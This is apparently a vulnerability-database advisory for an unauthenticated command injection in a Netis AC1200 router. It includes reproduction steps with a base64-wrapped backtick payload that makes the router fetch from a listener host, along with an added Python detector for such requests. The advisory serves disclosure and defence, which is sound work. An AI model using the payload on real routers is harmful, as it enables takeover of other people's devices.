CVE-2026-36540
Description
Netis AC1200 Router NC21 V4.0.1.4296 is vulnerable to unauthenticated command injection via the /cgi-bin/skk_set.cgi endpoint. The password and new_pwd_confirm POST parameters are passed directly to the underlying OS shell without sanitization. An attacker can inject arbitrary shell commands by wrapping them in backticks (`) and encoding them in base64. Because the endpoint requires no authentication, any device on the LAN can achieve full Remote Code Execution on the router's operating system with a single HTTP POST request.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Unauthenticated command injection in Netis AC1200 Router NC21 allows remote code execution via base64-encoded backtick payloads.
Vulnerability
The Netis AC1200 Router NC21 running firmware version V4.0.1.4296 contains an unauthenticated command injection vulnerability in the /cgi-bin/skk_set.cgi endpoint. The password and new_pwd_confirm POST parameters are passed directly to the underlying OS shell without any sanitization. An attacker can inject arbitrary shell commands by wrapping them in backticks and encoding the payload in base64. The endpoint requires no authentication, so any device on the local network can reach it. A proof-of-concept exploit is available in the disclosure repository [1].
Exploitation
An attacker only needs network access to the router's LAN (no authentication). The exploit sends a single HTTP POST request to /cgi-bin/skk_set.cgi with the malicious base64-encoded command in both the password and new_pwd_confirm fields. The CGI decodes the base64 string and passes it to a shell, where backticks cause the injected command to execute. For example, an attacker can run wget http://attacker:8080 to trigger an outbound connection, confirming code execution. The disclosure provides a full Python proof-of-concept script [1]. No race condition or user interaction is needed.
Impact
Successful exploitation yields full remote code execution on the router's underlying operating system with root privileges. The attacker can execute arbitrary shell commands, potentially gaining complete control over the device. This could lead to information disclosure (e.g., network traffic capture), denial of service, or further propagation within the network. The proof-of-concept demonstrates that the router initiates outbound connections, proving OS-level command execution [1].
Mitigation
As of the publication date (2026-05-27), the vendor (Netis Systems) has not responded to disclosure reports, and no patch has been released. Users should consider isolating the router from untrusted LAN segments or replacing it with a supported model. The vulnerability is not known to be listed in CISA's Known Exploited Vulnerabilities (KEV) catalog at this time. A firewall rule blocking access to /cgi-bin/skk_set.cgi from non-admin IPs may reduce risk, but the only complete mitigation is to update to a fixed firmware version when available [1].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: =4.0.1.4296
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization in the `/cgi-bin/skk_set.cgi` endpoint allows shell metacharacters in the `password` and `new_pwd_confirm` parameters to be passed directly to the OS shell."
Attack vector
An attacker on the same LAN sends a single HTTP POST request to `http://192.168.1.1/cgi-bin/skk_set.cgi` with no authentication required [ref_id=1]. The `password` and `new_pwd_confirm` parameters are base64-encoded shell commands wrapped in backticks; the CGI endpoint decodes and passes them unsanitized to the OS shell, achieving arbitrary command execution [ref_id=1]. The attacker can then exfiltrate data, install malware, or pivot to other internal hosts.
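A defender-side check for the request shape described above, as an added example that is not part of the advisory or the vendor's code: it inspects a captured or proxied HTTP request, base64-decodes the two affected parameters, and flags shell command syntax in either layer. The function names, the metacharacter set, and the sample bodies are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

ENDPOINT = "/cgi-bin/skk_set.cgi"         # endpoint named in the advisory
FIELDS = ("password", "new_pwd_confirm")  # parameters named in the advisory
# Backticks (named in the advisory) plus other command-substitution and
# separator syntax; an assumption to tune, since real passwords may contain these.
SHELL_META = re.compile(r"`|\$\(|[;&|\n]")


def decode_field(value):
    """Base64-decode a form value; return None if it is not valid base64."""
    # parse_qs turns an unescaped '+' into a space, so restore it first.
    value = value.replace(" ", "+")
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", "replace")


def inspect_request(method, path, body):
    """Return (field, offending_text) pairs for one HTTP request."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return []
    form = parse_qs(body, keep_blank_values=True)
    findings = []
    for field in FIELDS:
        for raw in form.get(field, []):
            # Check the value as sent and as the CGI would see it after decoding.
            for text in (raw, decode_field(raw)):
                if text and SHELL_META.search(text):
                    findings.append((field, text))
                    break
    return findings


def sample_body(password_text):
    """Build a constructed form body carrying the two affected parameters."""
    encoded = base64.b64encode(password_text.encode()).decode()
    return urlencode({"password": encoded, "new_pwd_confirm": encoded})


if __name__ == "__main__":
    # Constructed samples: the advisory's own example string and a plain password.
    for text in ("`wget http://192.168.1.101:8080`", "Correct-Horse-9"):
        print(text, "->", inspect_request("POST", ENDPOINT, sample_body(text)))
```

Because the endpoint is unauthenticated, any POST to it from a host that is not an administrator's workstation is worth alerting on even when this check returns no findings.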
Affected code
The vulnerability resides in the `/cgi-bin/skk_set.cgi` endpoint. The `password` and `new_pwd_confirm` POST parameters are passed directly to the underlying OS shell without sanitization [ref_id=1].
What the fix does
No patch has been released by the vendor (Netis Systems) as of the publication date [ref_id=1]. The advisory recommends sanitizing or escaping shell metacharacters (such as backticks) in the `password` and `new_pwd_confirm` parameters before passing them to the OS shell, and ideally avoiding shell execution altogether by using safer API calls [ref_id=1].
Preconditions
- network: Attacker must be on the same LAN as the router (target IP 192.168.1.1)
- auth: No authentication required
- input: Attacker must be able to send HTTP POST requests to the router
Reproduction
1. Start a listener on the attacker machine: `python3 -m http.server 8080` [ref_id=1].
2. Run the provided Python exploit script that sends a POST request to `http://192.168.1.1/cgi-bin/skk_set.cgi` with the `password` and `new_pwd_confirm` parameters set to a base64-encoded shell command wrapped in backticks (e.g., `` `wget http://192.168.1.101:8080` ``) [ref_id=1].
3. Observe the attacker's HTTP server receiving a connection from the router's IP (192.168.1.1), confirming remote code execution [ref_id=1].
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References